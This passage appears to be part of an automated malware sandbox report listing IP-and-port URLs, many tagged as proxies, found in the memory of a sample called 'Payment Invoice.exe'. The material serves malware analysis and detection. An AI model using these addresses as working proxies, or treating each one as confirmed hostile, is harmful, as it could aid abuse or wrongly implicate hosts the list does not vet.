                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.116.9:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.16.97
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.16.97://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.16.97:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317BD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.6.39:9080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317BE5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.6.39:9080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.9
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.95.19:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.95.19:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.95.19:9080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.54.95.19:9080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.56.23.33:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.56.23.33:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.56.70.97:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.56.70.97:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.109.253:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.109.253:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.18.102:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.18.102:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.4.89:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.4.89:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.4.90:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.7.4.90:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.83.108.89:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://38.83.108.89:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.105.5.126
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.105.5.126://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.105.5.126:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.108.227.108
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.108.227.108://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.108.227.108:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.108.229.14:8002
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.108.229.14:8002://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.109.113.97:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.109.113.97:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.165.0.137:9002
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://39.165.0.137:9002://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.144.161.159
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631967C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.144.161.159://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.144.161.159:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631699B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.182.9.108:443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631699B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.182.9.108:443://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.236.183.37:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://4.236.183.37:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://40.127.8.243
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://40.127.8.243://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://40.127.8.243:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317C13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://40.76.160.143:9000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://40.76.160.143:9000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.111.198.108
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.111.198.108://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.111.198.108:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.128.148.76:1976
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.128.148.76:1976://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.139.197.185:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.139.197.185:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.180.70.2:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.180.70.2:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.204.63.118
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.204.63.118:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.207.187.178://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.207.187.178:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.215.82.206:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.215.82.206:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.217.220.214:32650
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.217.220.214:32650://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.223.108.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.223.108.13:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.223.108.13:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.223.232.117:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316817000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.223.232.117:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317C8A000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.223.234.116:37259
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.223.234.116:37259://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.242.116.150:50003://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.203.115:1974
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.203.115:1974://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.203.233:1975
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.203.233:1975://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.203.234:1975
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.203.234:1975://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.219.131:1981
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.219.131:1981://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.66.228:1981
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.33.66.228:1981://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.60.233.97:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.60.233.97:56788
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.60.233.97:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.60.26.210:32650
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.60.26.210:32650://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.224.91:1981
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.224.91:1981://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631965D000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.227.98:1976
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319B31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.227.98:1976://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.37:1981
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.37:1981://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.56:1976
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.56:1976://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.56:1981
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.56:1981://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.57:1976
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.236.57:1976://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.55.10:1976
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.55.10:1976://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.55.10:1981
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.55.10:1981://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.55.2:1976
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.55.2:1976://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.55.2:1981
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.65.55.2:1981://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316823000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.74.91.244
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163167E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.74.91.244://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163167E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.74.91.244:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.77.188.131
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.77.188.131://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.77.188.131:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.85.8
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.85.8.233:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.85.8.233:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B2C000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.86.252.91:443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://41.86.252.91:443://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.200.196.208:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.200.196.208:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.61.48.219:8000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.61.48.219:8000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://42.61.48.219:8000x
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.128.232.224:31993
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.128.232.224:31993://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.129.210.41:10809
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.129.228.46:7890
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.129.228.46:7890://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.129.228.46:7891
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.129.228.46:7891://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.131.245.216:15673
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.131.245.216:15673://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.131.245.216:15673H
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.132.184.228:8181
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.132.184.228:8181://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.133.136.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.133.136.208:8800
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.133.136.208:8800://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.133.74.172:15673
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.133.74.172:15673://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.134.167.223:443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.134.167.223:443://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.134.238.25:443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.134.238.25:443://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.153.174.197:443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.153.174.197:443://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.153.174.4:443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.153.52.155:443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317066000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.153.52.155:443://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.153.64.66:443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.153.64.66:443://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163173F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.153.81.60:443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.153.81.60:443://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.155.165.196:15673
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.155.165.196:15673://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316DB0000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.157.32.4:443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316D72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.157.32.4:443://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.157.47.7:443
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.157.47.7:443://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.163.192.3:15673
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.163.192.3:15673://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.230.196.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.230.196.98:48200
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.230.196.98:48200://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.231.22.229
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.231.22.229://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.231.22.229:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.243.141.198:228
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.243.141.198:228://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631832C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.255.113.232
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.255.113.232://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163182A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.255.113.232:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.255.113.232:8083
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.255.113.232:8083://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://43.255.113.232:85
